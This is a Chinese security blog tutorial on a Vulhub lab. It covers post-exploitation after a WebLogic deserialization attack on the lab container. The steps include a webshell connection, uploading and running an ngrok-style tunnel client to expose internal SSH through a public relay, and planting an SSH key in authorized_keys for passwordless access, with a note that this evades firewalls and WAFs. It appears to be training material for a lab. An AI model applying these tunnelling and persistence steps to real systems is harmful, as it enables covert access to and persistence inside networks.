Vulhub靶机实现weblogic反序列化漏洞与内网穿透

  • A+
所属分类:安全文章

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

黑白之道首发,原标题:Vulhub搭建weblogic反序列化漏洞实现内网穿透

接着上篇文章

https://www.77169.net/html/265941.html


Ubuntu 192.168.50.157


Kali linux 192.168.50.53


当拿到weblogic 服务器后需要对内网的某些端口转发到公网进行各种花式操作,此次我们转发的是22端口。


登陆到Ubuntu


service docker start #首先开启docker 服务


docker ps  #查看当前docker 进行是否启动


Vulhub靶机实现weblogic反序列化漏洞与内网穿透

发现进程为空、所以我们执行 docker ps -a 查看挂起的所有进程

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

使用docker start aa  启动挂起进行、也可以把ID号输全效果一样aad658f37233

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

再次使用docker ps 查看

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

可以看到进程已经启动、我们使用宿主机访问下

 192.168.50.157:7001/console

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

到此基本可以确定环境没有问题、我们登陆到靶机上安装下ssh服务。

使用docker exec -it aa /bin/bash 登陆到靶机shell下

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

apt-get install ssh

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

报错 提示要更新系统(更新的时候可能会很慢、建议大家修改更新源)

Vulhub靶机实现weblogic反序列化漏洞与内网穿透
Vulhub靶机实现weblogic反序列化漏洞与内网穿透

再次安装 apt-get install ssh

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

可以看到已经安装成功、使用service ssh start 开启22端口

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

按下Ctrl+d断开当前shell连接、在Ubuntu下抓取ens33接口流量方便后期分析

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

打开kali linux 进行攻击、因为上篇文章已经说了如何进行攻击 这次就不截图说明、直接在反弹后的shell 下进行操作。

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

打开冰蝎进行连接

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

下载内网穿透工具解压后上传到根目录

https://www.ngrok.cc/sunny/linux_amd64.zip?v=2.1

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

然后打开http://www.ngrok.cc/_book/start/ngrok_linux.html 看下使用方法
./sunny clientid 隧道id

隧道ID需要注册账号才能获取

Vulhub靶机实现weblogic反序列化漏洞与内网穿透
Vulhub靶机实现weblogic反序列化漏洞与内网穿透

运行内网穿透工具

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

传入公钥到/root/.ssh/authorized_keys下

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

使用ssh 免秘钥登录

去掉注释 重启服务 service ssh restart否则登录提示需要输入密码

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

ssh [email protected] vipgz4.idcfengye.com -p 11111

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

可以看到已经不需要输入密码直接可以进行登录

Weblogic环境只对外只开放了5556、7001 端口、而我们可以直接使用./sunny 进行内网穿透、无视防护墙、WAF,但是此方法容易被安全设备告警。

Vulhub靶机实现weblogic反序列化漏洞与内网穿透


最后,另外有个群,有问题可以在群里问:

Vulhub靶机实现weblogic反序列化漏洞与内网穿透


的确,我们的群只公布出来半小时就加满了。我给个名单吧,你看认识谁让拉群就行。如果都不认识,你分享完文章之后加我们运营,让她拉你进群。

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

Vulhub靶机实现weblogic反序列化漏洞与内网穿透


推荐文章++++

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

*使用Vulhub快速搭建攻防环境靶场+tcpdump实行流量监测

*漏洞复现环境集锦-Vulhub

*Vulhub:一键搭建漏洞测试环境


Vulhub靶机实现weblogic反序列化漏洞与内网穿透

Vulhub靶机实现weblogic反序列化漏洞与内网穿透

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: